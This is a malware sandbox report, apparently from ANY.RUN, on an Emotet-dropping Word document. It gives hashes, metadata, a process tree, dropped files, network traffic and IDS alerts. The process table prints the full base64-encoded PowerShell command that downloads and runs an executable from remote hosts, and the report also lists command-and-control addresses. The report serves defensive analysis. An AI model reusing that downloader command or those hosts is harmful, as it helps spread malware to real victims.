analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

GB_03786017313_1014.doc

Full analysis: https://app.any.run/tasks/c7997970-02f9-4632-b3c0-aea7c1c178c6
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: October 14, 2019, 14:50:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Spring, Subject: Legacy, Author: Janice Terry, Keywords: PCI, Comments: seamless, Template: Normal.dotm, Last Saved By: Bridgette Krajcik, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 07:34:00 2019, Last Saved Time/Date: Mon Oct 14 07:34:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 175, Security: 0
MD5:

B2AA7083B0D4DB137A550B75DEBBC900

SHA1:

BDEC7CC4465DB0C83BFF0630EB2DC5FD93BB9F8F

SHA256:

E3456221E5332E6179FCCB616E43AAE746A7754F8B2648722C6650CB0CF51E44

SSDEEP:

6144:oHz1HaeCuKUzSdWnLx3c5F1TpJWsWO/g2aJFCHosE9:oHz1HaeCzUGdWt30F/g2cEBe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 743.exe (PID: 2480)
      • msptermsizes.exe (PID: 3832)
      • msptermsizes.exe (PID: 1036)
      • 743.exe (PID: 3300)

    • Emotet process was detected

      • 743.exe (PID: 2480)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 3132)

    • Connects to CnC server

      • msptermsizes.exe (PID: 3832)

    • EMOTET was detected

      • msptermsizes.exe (PID: 3832)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • 743.exe (PID: 2480)
      • powershell.exe (PID: 3132)

    • Starts itself from another location

      • 743.exe (PID: 2480)

    • Application launched itself

      • 743.exe (PID: 3300)

    • Creates files in the user directory

      • powershell.exe (PID: 3132)

    • Executed via WMI

      • powershell.exe (PID: 3132)

    • PowerShell script executed

      • powershell.exe (PID: 3132)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2260)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2260)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Paucek
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 204
Paragraphs: 1
Lines: 1
Company: VonRueden - Dickinson
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 175
Words: 30
Pages: 1
ModifyDate: 2019:10:14 06:34:00
CreateDate: 2019:10:14 06:34:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Bridgette Krajcik
Template: Normal.dotm
Comments: seamless
Keywords: PCI
Author: Janice Terry
Subject: Legacy
Title: Spring
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 743.exe no specs #EMOTET 743.exe msptermsizes.exe no specs #EMOTET msptermsizes.exe

Process information

PID
CMD
Path
Indicators
Parent process
2260"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\GB_03786017313_1014.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3132powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABmADYAMAA5ADYAOABkADYAOQBkAD0AJwBhADAAeAA1AGIANABhADIANABhAGYANQA1ACcAOwAkAGEAMAB4ADUAMwBmAGUANgA1ADMAYgBmAGQAMQBhAGIANgA2ACAAPQAgACcANwA0ADMAJwA7ACQAYQAwAHgAMAAxADAAYgBiAGYAYwBiADkANwA1ADkAPQAnAGEAMAB4ADkAZgA5AGUANgA1AGIAZgA3AGMAMwBlAGIAYgAnADsAJABhADAAeAA4AGUAMQAxAGUAYQBkADcAMQBkADQANwBiAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADAAeAA1ADMAZgBlADYANQAzAGIAZgBkADEAYQBiADYANgArACcALgBlAHgAZQAnADsAJABhADAAeAAzAGUANgA5ADcAYgA1AGUAMgA5AD0AJwBhADAAeAAxAGMANQA4AGIAMwA2ADYAYgA0AGIAZAAxACcAOwAkAGEAMAB4AGQANAAzADkANwAxADMANgBlADQAMQAxADMAZgA2AD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAEUAVAAuAFcAZQBCAEMATABJAGUATgBUADsAJABhADAAeAAyAGUAZAA2AGIANgBlADEAYgA4ADUAMQA9ACcAaAB0AHQAcAA6AC8ALwBzAGcAbgByAC4AaQBuAC8AZABpAGUAdABpAHQAaQBhAG4AcwBhAGsAcwBoAGkALwBhADQAZABlAG4AbwAzAHcALQA3AGsAZQA3AHkAMgAtADcAMAA2ADMANwAwADQAMQAyAC8AKgBoAHQAdABwADoALwAvAHAAZQBkAHIAbwBvAHQAYQB2AGkAbwAuAHQAbwBwAC8AYwBnAGkALQBiAGkAbgAvADkAaQBhAGwAZQAtAGMAYQA2AGQAdAByADYAZwBrAC0ANQA2ADEANQAxADcANgAyAC8AKgBoAHQAdABwAHMAOgAvAC8AagAtAGMAdABhAC4AbwByAGcALwB3AHAALQBhAGQAbQBpAG4ALwBMAGcAYgBvAFkASQBtAC8AKgBoAHQAdABwAHMAOgAvAC8AdABoAGUAaABvAG0AZQBiAGUAbgBlAGYAaQB0AHAAcgBvAGcAcgBhAG0ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEgAcgBjAGkAQwBOAC8AKgBoAHQAdABwAHMAOgAvAC8AYQBkAGEAbgB6AHkAZQB5AGEAcABpAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwA0AHYAMABwAC0AdAAxAGUANgBzADYAbQA2AC0AMAA5ADgALwAnAC4AIgBTAFAATABgAGkAdAAiACgAJwAqACcAKQA7ACQAYQAwAHgAYwAzADEAMABlADMANwAzAGYAZQBkAD0AJwBhADAAeABjAGMAYQAwAGQAYgA3AGEAMgA3ACcAOwBmAG8AcgBlAGEAYwBoACgAJABhADAAeAAyAGEAZABiAGIAZABmADEAMwAxAGYANQA0ADgAIABpAG4AIAAkAGEAMAB4ADIAZQBkADYAYgA2AGUAMQBiADgANQAxACkAewB0AHIAeQB7ACQAYQAwAHgAZAA0ADMAOQA3ADEAMwA2AGUANAAxADEAMwBmADYALgAiAEQATwBXAG4AYABMAG8AQQBgAEQAYABGAGkATABlACIAKAAkAGEAMAB4ADIAYQBkAGIAYgBkAGYAMQAzADEAZgA1ADQAOAAsACAAJABhADAAeAA4AGUAMQAxAGUAYQBkADcAMQBkADQANwBiACkAOwAkAGEAMAB4AGUAZgAyADgANwA3ADIAMQA1ADUANQA5AGEAPQAnAGEAMAB4AGQANQBiADUAOABjADAANwBmADMAMQAzAGUAZABkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAYQAwAHgAOABlADEAMQBlAGEAZAA3ADEAZAA0ADcAYgApAC4AIgBMAEUAYABOAEcAYABUAGgAIgAgAC0AZwBlACAAMwA4ADUANwA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAGEAMAB4ADgAZQAxADEAZQBhAGQANwAxAGQANAA3AGIAKQA7ACQAYQAwAHgAYwBiADAANAA0AGEAOAA3AGIANwA1ADcAPQAnAGEAMAB4ADUAYQAyADkANAA3ADIAYwA4AGQANwAzADUANgAnADsAYgByAGUAYQBrADsAJABhADAAeAA0ADgAYQA5AGMAZgAzADQAOABiADMAZQA9ACcAYQAwAHgAYgAwADgAMgBiADkAYwAzADgAMgBhADAAMwAyACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGEAMAB4ADQAMgAzADgAMwBjAGMAZAAzADYANwBkADAAOQA9ACcAYQAwAHgAZgAyADIANwBhADIAYQBhADYAMABmADgAZgBjAGIAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3300"C:\Users\admin\743.exe" C:\Users\admin\743.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Exit code:
0
Version:
1, 0, 0, 1
2480--a90d1734C:\Users\admin\743.exe
743.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Exit code:
0
Version:
1, 0, 0, 1
1036"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe743.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Exit code:
0
Version:
1, 0, 0, 1
3832--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
msptermsizes.exe
User:
admin
Integrity Level:
MEDIUM
Description:
DirectoryBrowse MFC Application
Version:
1, 0, 0, 1
Total events
2 531
Read events
1 674
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
16

Dropped files

PID
Process
Filename
Type
2260WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB6B8.tmp.cvr
MD5:
SHA256:
3132powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XI67XO23KZT4SPZKX756.temp
MD5:
SHA256:
2260WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\GB_03786017313_1014.doc.LNKlnk
MD5:15108FE0F4904F04BF0E15B28C65CFFD
SHA256:5EB1D0245949D1326E4FF72D02B4C2E39ED19192EF0A35FB1BF67B2BCE2FC2CE
2260WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3904AC2.wmfwmf
MD5:D12A4C9DB6739CF8C14BE166A203FD4B
SHA256:46B388FE7CCC05F5567B37052FDD89E01608623F6204A8F91EDB202D3F886C50
2260WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDA87820.wmfwmf
MD5:09B63D8340934094A148E3ACD838F2DF
SHA256:2CC37315F94EACAABF17C6213BB9775D818A4DB5C254ABA16D4339C125EFEB9F
2260WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\81ACA716.wmfwmf
MD5:DA98CE5B21D5A480AC46729CA91BE056
SHA256:E7B8398B7E35B7D51CEFB33A755F831B6821284E301FCBA42F12E5382CAF9A86
2260WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:A1A2D874F2212CB6A496BDA6AF19F873
SHA256:483A27E3D391F3B3717AF8920D13A9D09A16E6B69BC86973225F2945D7CFFC4B
2260WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E67C332E.wmfwmf
MD5:A780DC91E3F0CA377281E9A75A852F2F
SHA256:E99D69F0F77F03A6745EE2C2100908180AD656657FDFA703DD7B38ACA3D6F048
2260WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E8BB76C.wmfwmf
MD5:5D617C6A4A087A3B01771C0EB9B1A9E0
SHA256:556E24E818448E5FE6B9C47929863EEDA8EAFF4CCD241C4EA9F9210E931D7FBF
2260WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DEF9B94.wmfwmf
MD5:6CB3B37671576CD20DC3945491B4447E
SHA256:0EC43CFDAA7DE6670D7D2B9ACF7115ABAFB11C8FA12AB95A068715E2F5E46A98
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3832
msptermsizes.exe
POST
190.117.206.153:443
http://190.117.206.153:443/attrib/
PE
malicious
3132
powershell.exe
GET
200
13.234.168.135:80
http://sgnr.in/dietitiansakshi/a4deno3w-7ke7y2-706370412/
IN
executable
540 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3132
powershell.exe
13.234.168.135:80
sgnr.in
Amazon.com, Inc.
IN
suspicious
3832
msptermsizes.exe
190.117.206.153:443
America Movil Peru S.A.C.
PE
malicious

DNS requests

Domain
IP
Reputation
sgnr.in
  • 13.234.168.135
suspicious

Threats

PID
Process
Class
Message
3132
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3132
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3132
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3832
msptermsizes.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 11
3832
msptermsizes.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3832
msptermsizes.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3832
msptermsizes.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
GB_03786017313_1014.doc